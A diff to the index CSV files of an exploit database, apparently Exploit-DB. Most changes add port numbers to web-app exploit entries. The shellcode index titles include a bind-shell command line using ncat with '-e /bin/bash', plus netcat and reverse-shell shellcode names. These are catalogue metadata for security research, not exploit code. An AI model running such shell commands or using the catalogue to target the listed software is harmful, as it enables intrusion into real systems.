44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware, 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80 -44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80 +44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua, 44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, @@ -40321,7 +40321,7 @@ id,file,description,date,author,type,platform,port 45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx, 45707,exploits/php/webapps/45707.txt,"Open Faculty Evaluation System 7 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php, 45713,exploits/php/webapps/45713.txt,"Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php, -45717,exploits/php/webapps/45717.txt,"MTGAS MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80 +45717,exploits/php/webapps/45717.txt,"MTGAS MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80 45718,exploits/php/webapps/45718.txt,"Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery",2018-10-29,"Ihsan Sencan",webapps,php,80 45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 45720,exploits/php/webapps/45720.txt,"Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 @@ -40449,7 +40449,7 @@ id,file,description,date,author,type,platform,port 45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux, 45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80 45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80 -45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php, +45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php,80 45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80 45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware, 45944,exploits/php/webapps/45944.txt,"KeyBase Botnet 1.5 - SQL Injection",2018-12-04,n4pst3r,webapps,php, @@ -40463,17 +40463,17 @@ id,file,description,date,author,type,platform,port 45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php, 45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80 45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,80 -45963,exploits/php/webapps/45963.txt,"Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery",2018-12-11,"Ihsan Sencan",webapps,php, -45964,exploits/php/webapps/45964.php,"PrestaShop 1.6.x/1.7.x - Remote Code Execution",2018-12-11,"Fariskhi Vidyan",webapps,php, -45967,exploits/php/webapps/45967.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-12-11,"Mohammed Abdul Raheem",webapps,php, +45963,exploits/php/webapps/45963.txt,"Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery",2018-12-11,"Ihsan Sencan",webapps,php,80 +45964,exploits/php/webapps/45964.php,"PrestaShop 1.6.x/1.7.x - Remote Code Execution",2018-12-11,"Fariskhi Vidyan",webapps,php,80 +45967,exploits/php/webapps/45967.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-12-11,"Mohammed Abdul Raheem",webapps,php,80 45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple, -45970,exploits/hardware/webapps/45970.txt,"TP-Link wireless router Archer C1200 - Cross-Site Scripting",2018-12-11,"Usman Saeed",webapps,hardware, -45971,exploits/hardware/webapps/45971.txt,"Huawei B315s-22 - Information Leak",2018-12-11,"Usman Saeed",webapps,hardware, +45970,exploits/hardware/webapps/45970.txt,"TP-Link wireless router Archer C1200 - Cross-Site Scripting",2018-12-11,"Usman Saeed",webapps,hardware,80 +45971,exploits/hardware/webapps/45971.txt,"Huawei B315s-22 - Information Leak",2018-12-11,"Usman Saeed",webapps,hardware,80 45972,exploits/hardware/webapps/45972.txt,"ZTE ZXHN H168N - Improper Access Restrictions",2018-12-11,"Usman Saeed",webapps,hardware, 45973,exploits/aspx/webapps/45973.txt,"Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure",2017-05-05,"Usman Saeed",webapps,aspx, 45974,exploits/php/webapps/45974.txt,"IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting",2014-02-17,"Usman Saeed",webapps,php, 45975,exploits/multiple/webapps/45975.txt,"Apache OFBiz 16.11.05 - Cross-Site Scripting",2018-12-11,DKM,webapps,multiple, -45976,exploits/php/webapps/45976.txt,"HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection",2018-12-11,"Sainadh Jamalpur",webapps,php, -45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php, -45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php, +45976,exploits/php/webapps/45976.txt,"HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection",2018-12-11,"Sainadh Jamalpur",webapps,php,80 +45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80 +45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 637de6fdc..60c3ec110 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -925,4 +925,4 @@ id,file,description,date,author,type,platform 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 -45980,shellcodes/linux_x86/45980.c,"Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 +45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86